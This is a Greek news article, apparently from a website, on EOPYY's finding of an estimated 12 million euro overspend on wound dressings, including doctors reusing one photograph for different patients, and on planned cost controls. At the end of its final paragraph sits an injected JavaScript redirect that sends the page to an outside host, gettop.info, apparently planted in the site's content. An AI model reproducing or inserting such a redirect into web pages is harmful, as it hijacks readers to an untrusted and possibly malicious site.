12 εκατ. ευρώ για επιθέματα!

0
5

 

Σε περισσότερα από 12.000.000 ευρώ, υπολογίζεται η εκτιμώμενη υπέρβαση από τις δαπάνες για τα επιθέματα και όπως προέκυψε από τους ελέγχους του ΕΟΠΥΥ, φαίνεται πως γιατροί από διάφορα μέρη της Ελλάδας συνταγογράφησαν σε διαφορετικούς ασθενείς,επιθέματα, προσκομίζοντας την ίδια φωτογραφία.

Όπως ανέφερε ο πρόεδρος του Οργανισμού Σωτήρης Μπερσίμης, κατά την διάρκεια των εργασιών του 2ουΠανευρωπαϊκού Συμποσίου που διοργάνωσε ο Πανελλήνιος Φαρμακευτικός Σύλλογος, η προσπάθεια επικεντρώνεται στην μετατροπή του Οργανισμού από «παθητικό» σε δυναμικό ελεγκτικό μηχανισμό, για ορθολογικότερη διαχείριση των πόρων και έλεγχο του κόστους των προσφερομένων υπηρεσιών.

Ο κ. Μπερσίμης, ανακοίνωσε πως μέσω των νέων συμβάσεων του Οργανισμού με τους γιατρούς θα βελτιωθεί η χωροταξική κατανομή των συμβεβλημένων επαγγελματιών υγείας.

Οσον αφορά τον έλεγχο της φαρμακευτικής δαπάνης , ο κ. Μπερσίμης ανακοίνωσε ότι ο Οργανισμός προχωρά σε δράσεις όπως η ολοκλήρωση των Μητρώων Ασθενών, αξιοποίηση της ιατροτεχνολογίας, αναδιαμόρφωση και ενοποίηση του συστήματος rebate , ομαλοποίηση των χρηματικών ροών προς τους παρόχους με διαφάνεια και δικαιοσύνη επανεξέταση και βελτίωση του μηχανισμού αυτόματων επιστροφών (claw back) και η δημιουργία κλειστών προϋπολογισμών ανά θεραπευτική κατηγορία setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here